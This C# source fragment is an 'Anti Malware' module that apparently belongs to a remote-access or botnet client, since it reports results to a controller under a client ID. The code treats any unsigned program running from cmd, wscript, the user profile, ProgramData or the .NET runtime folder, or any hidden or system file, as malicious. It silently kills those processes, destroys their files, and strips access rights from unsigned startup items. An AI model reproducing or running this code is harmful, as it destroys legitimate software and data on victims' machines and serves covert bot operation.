public bool IsFileMalicious(string fileloc) { if (fileloc.Contains(Application.ExecutablePath)) { return(false); } if (fileloc.Contains("cmd")) { return(true); } if (fileloc.Contains("wscript")) { return(true); } if (fileloc.Contains(System.Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory())) { return(true); } if (WinTrust.VerifyEmbeddedSignature(fileloc) == true) { return(false); } if ((fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData)))) { return(true); } FileAttributes attributes; attributes = File.GetAttributes(fileloc); if ((attributes & FileAttributes.System) == FileAttributes.System) { return(true); } if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden) { return(true); } return(false); }
public void Start() { mwork.addinfo("[Anti Malware] Execution Parameters:" + excparams); mwork.addinfo("[Anti Malware] Successfully started Malware Cleaner..."); try { try { Process[] Proc = Process.GetProcesses(); string path; for (int x = 0; x <= Proc.Length - 1; x++) { Process p = Proc[x]; try { path = System.IO.Path.GetFullPath(p.MainModule.FileName); if (IsFileMalicious(path)) { if (!WindowIsVisible(p.MainWindowTitle)) { try { p.Kill(); mwork.addlog("[Anti Malware] Killed Process: " + p.ProcessName); } catch { } DestroyFile(path); killed = killed + 1; } } } catch { } } } catch { } string[] tehfilesandshit = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); foreach (var workload in tehfilesandshit) { if (WinTrust.VerifyEmbeddedSignature(workload) == false) { System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(workload); DirectorySecurity FolderAcl = new DirectorySecurity(); FolderAcl.SetAccessRuleProtection(true, false); FolderInfo.SetAccessControl(FolderAcl); mwork.addlog("[Anti Malware] Removed Startup Item: " + workload); } } } catch { } string priority = ""; if (killed == 0) { priority = "Info"; } else if (killed == 1) { priority = "Log"; } else if (killed > 2) { priority = "Priority"; } else if (killed > 5) { priority = "Risk"; } mwork.Send("ADDLOG|" + mwork.ClientID + "|" + priority + "|" + "Successfully finished Anti Malware Task. Processes killed: " + killed.ToString() + "."); mwork.addinfo("[Anti Malware] Processes killed: " + killed.ToString()); mwork.addinfo("[Anti Malware] Files destroyed: " + fileskilled.ToString()); mwork.addinfo("[Anti Malware] Successfully finished the Malware Cleaning!"); }